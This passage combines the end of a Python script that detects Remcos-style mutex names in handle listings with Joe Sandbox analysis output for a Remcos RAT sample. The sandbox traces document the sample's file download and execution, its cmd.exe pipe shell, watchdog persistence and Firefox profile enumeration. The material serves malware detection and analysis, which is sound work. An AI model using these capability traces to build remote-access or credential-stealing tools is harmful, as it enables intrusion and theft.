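# Assumption: one handle per line, "<process> pid: <n> type: <type> <object path>"
# (a constructed format, not the output of any particular tool).
HANDLE_LINE_RE = re.compile(
    r"^(?P<proc>\S+)\s+pid:\s*(?P<pid>\d+)\s+type:\s*(?P<type>\S+)\s+(?P<name>\S.*)$"
)


@dataclass(frozen=True)
class Hit:
    process: str
    pid: int
    mutex: str
    exact_ioc: bool  # True when the name equals the mutex from this report


def is_remcos_mutex(name: str) -> bool:
    """Return True for a Remcos-style mutex name such as Rmc-MKYDDH."""
    return REMCOS_MUTEX_RE.match(name) is not None


def scan_handle_listing(lines):
    """Return a Hit for every Mutant handle whose leaf name matches the pattern.

    Only objects of type Mutant count: an Event carrying the same name is
    not the single-instance mutex and is deliberately ignored.
    """
    hits = []
    for line in lines:
        m = HANDLE_LINE_RE.match(line.strip())
        if not m or m.group("type") != "Mutant":
            continue
        # Named objects live under \BaseNamedObjects; keep only the leaf name.
        leaf = m.group("name").rsplit("\\", 1)[-1]
        if is_remcos_mutex(leaf):
            hits.append(Hit(m.group("proc"), int(m.group("pid")), leaf, leaf == SAMPLE_MUTEX))
    return hits


# Constructed sample listing. The wmplayer.exe line mirrors the process named in
# the report's snapshot file; the pid and the other lines are invented decoys.
SAMPLE_LISTING = [
    "wmplayer.exe pid: 4052 type: Mutant \\Sessions\\1\\BaseNamedObjects\\Rmc-MKYDDH",
    "explorer.exe pid: 1234 type: Mutant \\Sessions\\1\\BaseNamedObjects\\ExplorerIsShellMutex",
    "svchost.exe pid: 900 type: Event \\BaseNamedObjects\\Rmc-ABC123",
    "notepad.exe pid: 2222 type: Mutant \\Sessions\\1\\BaseNamedObjects\\Rmc-ab12cd",
    "chrome.exe pid: 3333 type: Mutant \\Sessions\\1\\BaseNamedObjects\\Rmc-Q7X2P9",
]

if __name__ == "__main__":
    for h in scan_handle_listing(SAMPLE_LISTING):
        tag = "exact IoC from this report" if h.exact_ioc else "pattern match"
        print(f"{h.process} (pid {h.pid}) holds mutex {h.mutex} [{tag}]")
```

Run against the constructed listing it reports two hits: the exact mutex from this report held by wmplayer.exe, and a second pattern match that would need triage. The lower-case Rmc-ab12cd name and the Event object are skipped on purpose, so a pattern hit is a lead rather than a verdict; the exact name is the stronger indicator.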
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
• RegCloseKey.KERNEL32(?), ref: 0041255F
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
• Instruction ID: 155fce86b91483c744b9f02885d56de91ccd1cdd8f33956e2d71fd22bd1c87ae
• Opcode Fuzzy Hash: 147e62fc4eb0db3fe2726599cc038d375497f210b40a1d92884617782f01b657
• Instruction Fuzzy Hash: F0F08176900118BBCB209BA1ED48DEF7FBDEB44751F004066BA06E2150D6749E55DBA8
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
• RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
• RegCloseKey.KERNEL32(00000000), ref: 0041269D
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
• Instruction ID: c18416eb0b1572374c3e2b3be0649ca89fc6f9e16ed4320a44d925c8ae57db2a
• Opcode Fuzzy Hash: f35e7c15da94557ef338f13a10ac7e5db7717a73998ec4005cb99cacd37e3820
• Instruction Fuzzy Hash: BD018131404229FBDF216FA1DC45DDF7F78EF11754F004065BA04A21A1D7758AB5DBA8
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
• RegCloseKey.KERNEL32(?), ref: 00412500
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction ID: 3c8b5742b91bab9b7a0bfd6479237677f271592d1db5ef4b45a1d16c6b8d7bbd
• Opcode Fuzzy Hash: 9045fb9a7a6208df116313aaf282ceb7280aaf27367a6f7e2add9e4d3bf57581
• Instruction Fuzzy Hash: C0F03A76900208BFDF119FA0AC45FDF7BB9EB04B55F1040A1FA05F6291D670DA54EB98
APIs
• RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?,00000000,?,?,0040B996,004660E0), ref: 00412485
• RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,0040B996,004660E0), ref: 00412499
• RegCloseKey.KERNEL32(?,?,?,0040B996,004660E0), ref: 004124A4
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID:
• API String ID: 3677997916-0
• Opcode ID: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
• Instruction ID: 2a31b93e49ffe9e6f23ef690bd11c8afd6de107f9352384350bf23698ee7218d
• Opcode Fuzzy Hash: e297991b72ec1606279c96c89a25a7ac8737aea41b7b6b8683e2e1c686c69e22
• Instruction Fuzzy Hash: 46E06531405234BBDF314BA2AD0DDDB7FACEF16BA17004061BC09A2251D2658E50E6E8
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: _wcslen
• String ID: xAG
• API String ID: 176396367-2759412365
• Opcode ID: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
• Instruction ID: 4b5f0267b16b6d1f94f05398eea60063c36f9fdec9e789d07f1c8464d26cb595
• Opcode Fuzzy Hash: 0ac88d79a516735da27acb6035cf341692fb6add59adde25db919d3c5127634c
• Instruction Fuzzy Hash: 751193325002049FCB15FF66D8968EF7BA4EF64314B10453FF842622E2EF38A955CB98
APIs
• GlobalMemoryStatusEx.KERNEL32(?), ref: 0041A959
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: GlobalMemoryStatus
• String ID: @
• API String ID: 1890195054-2766056989
• Opcode ID: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
• Instruction ID: dd145fffdacd7bda74fa2c6e5abe56fe406d4b7e613986be5c07feff288e4f4e
• Opcode Fuzzy Hash: 6a5e85952f382d12afcc854e62baf2dc0b8e461fb7fe04101b075e185c2318ef
• Instruction Fuzzy Hash: EFD067B99013189FCB20DFA8E945A8DBBF8FB48214F004529E946E3344E774E945CB95
APIs
• socket.WS2_32(00000002,00000001,00000006), ref: 00404212
  • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
• CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: CreateEventStartupsocket
• String ID:
• API String ID: 1953588214-0
• Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
• Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
• Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
APIs
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433DE7
  • Part of subcall function 00437BD7: RaiseException.KERNEL32(?,?,00434411,?,?,?,?,?,?,?,?,00434411,?,0046D644,0041AD75,?), ref: 00437C37
• __CxxThrowException@8.LIBVCRUNTIME ref: 00433E04
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Exception@8Throw$ExceptionRaise
• String ID:
• API String ID: 3476068407-0
• Opcode ID: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
• Instruction ID: 1b32a2814776e74a5aaecdac66354fa275a8f3c838098619b8de34dc4906cb01
• Opcode Fuzzy Hash: a80fbdf5468804761b56489a3a39c56644ed3c61f36a154b7cd34dcf14c41ed8
• Instruction Fuzzy Hash: 33F02B30C0020D77CB14BEA5E80699D772C4D08319F20923BB920915E1EF7CEB05858D
APIs
• GetForegroundWindow.USER32 ref: 0041AC74
• GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC87
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Window$ForegroundText
• String ID:
• API String ID: 29597999-0
• Opcode ID: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
• Instruction ID: 3cf16c2a8257e52241c70e3f2477159e0ff99a2dafdd86ddfb3cfc0a4d760bbd
• Opcode Fuzzy Hash: 1796dd390df28a7f4dbf89d7f01fc1bba1536ee62ee2177b21e7863b89c7f1ab
• Instruction Fuzzy Hash: 56E04875A0031467EB24A765AC4EFDA766C9704715F0000B9BA19D21C3E9B4EA04CBE4
APIs
• VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
• Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
• Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
• Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
APIs
• RtlAllocateHeap.NTDLL(00000000,00434403,?,?,00437227,?,?,?,?,?,0040CC87,00434403,?,?,?,?), ref: 00446B31
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
• Instruction ID: 23017b4f7b15ec8d1e6c8205d578d5100ba2a3a3bb6c043e3f5ab96588fe2cc9
• Opcode Fuzzy Hash: 382123f4ff15faebfb065adfee4593ee0e25617df91b7722ec70fd9da05ca189
• Instruction Fuzzy Hash: 16E0E5312002B556FB202A6A9C05F5B7A88DB437A4F160133AC09D62D0CF5CEC4181AF
APIs
• WSAStartup.WS2_32(00000202,00000000), ref: 00404277
Memory Dump Source
• Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
Similarity
• API ID: Startup
• String ID:
• API String ID: 724789610-0
• Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
• Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
• Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
• Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Deallocate
                                                                                            • String ID:
                                                                                            • API String ID: 1075933841-0
                                                                                            • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                            • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                            • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                            • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 4275171209-0
                                                                                            • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                            • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                            • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                            • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                            APIs
                                                                                            • SetEvent.KERNEL32(?,?), ref: 00406F28
                                                                                            • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                            • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                              • Part of subcall function 0041B42F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                              • Part of subcall function 0041B42F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                              • Part of subcall function 0041B42F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                              • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                              • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                              • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                              • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                              • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                              • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                              • Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                            • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                            • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                            • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                            • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                              • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                              • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                              • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                            • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                            • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                              • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                            • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                            • API String ID: 2918587301-599666313
                                                                                            • Opcode ID: 25acaa2856dc7008fddf9ec0cecc0cbb53e0c4836b5282fa1f3646b03ece5032
                                                                                            • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                                            • Opcode Fuzzy Hash: 25acaa2856dc7008fddf9ec0cecc0cbb53e0c4836b5282fa1f3646b03ece5032
                                                                                            • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                                            APIs
                                                                                            • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                              • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                              • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                              • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                            • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                            • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                                            • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                              • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                              • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                                            • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                                            • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                            • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                              • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                                            • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                            • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                            • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                            • CloseHandle.KERNEL32 ref: 004053CD
                                                                                            • CloseHandle.KERNEL32 ref: 004053D5
                                                                                            • CloseHandle.KERNEL32 ref: 004053E7
                                                                                            • CloseHandle.KERNEL32 ref: 004053EF
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                            • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                                            • API String ID: 3815868655-81343324
                                                                                            • Opcode ID: fd6885247ebe03a599233805bbd721c2697f19282cb397e78aacb19e14c40894
                                                                                            • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                                            • Opcode Fuzzy Hash: fd6885247ebe03a599233805bbd721c2697f19282cb397e78aacb19e14c40894
                                                                                            • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                                            APIs
                                                                                            • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                              • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                              • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                              • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                            • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                              • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                              • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                              • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                              • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                            • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000006.00000002.4568327256.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            • Associated: 00000006.00000002.4568327256.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_6_2_400000_wmplayer.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                            • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                            • API String ID: 65172268-860466531
                                                                                            • Opcode ID: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                            • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                                            • Opcode Fuzzy Hash: f37c5126c027c7c3e0fa34fe350a0c5b3513135de5084eb22c34a7d5917134fe
                                                                                            • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                                            APIs
                                                                                            • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                            • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                            • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                            Strings
                                                                                            Memory Dump Source
